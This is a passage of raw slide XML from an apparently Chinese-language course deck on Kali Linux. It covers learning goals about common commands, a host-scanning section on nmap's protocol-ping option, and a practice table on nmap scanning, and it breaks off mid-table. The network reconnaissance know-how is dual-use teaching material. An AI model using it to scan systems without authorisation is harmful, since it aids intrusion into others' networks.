          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="文本框 136"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5655310" y="941387"/>
            <a:ext cx="5080000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>5.除此之外，还可以在“-PO”参数后选择其他的协议号进行尝试，如ARP、TCP等协议，如图2-2-33所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5655310" y="1863408"/>
            <a:ext cx="5267325" cy="3590925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="文本框 137"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5655310" y="5454333"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-33 自定义IP协议</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【学习目标】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="7602220" cy="1362075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1.能够掌握Kali Linux的常用命令。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2.能够管理Kali Linux系统的软件包。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="矩形 77"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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79" name="矩形 78"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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17" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Kali Linux常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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 name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目训练】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2148205" y="1935480"/>
            <a:ext cx="6824345" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>按下表所列项目节点，练习利用nmap进行主机扫描。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="表格 1"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2578100" y="2604770"/>
          <a:ext cx="7606030" cy="3204210"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1598295"/>
                <a:gridCol w="3278505"/>
                <a:gridCol w="2729230"/>
              </a:tblGrid>
              <a:tr h="262890">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>项目名称</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="1">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>项目节点</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="1">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
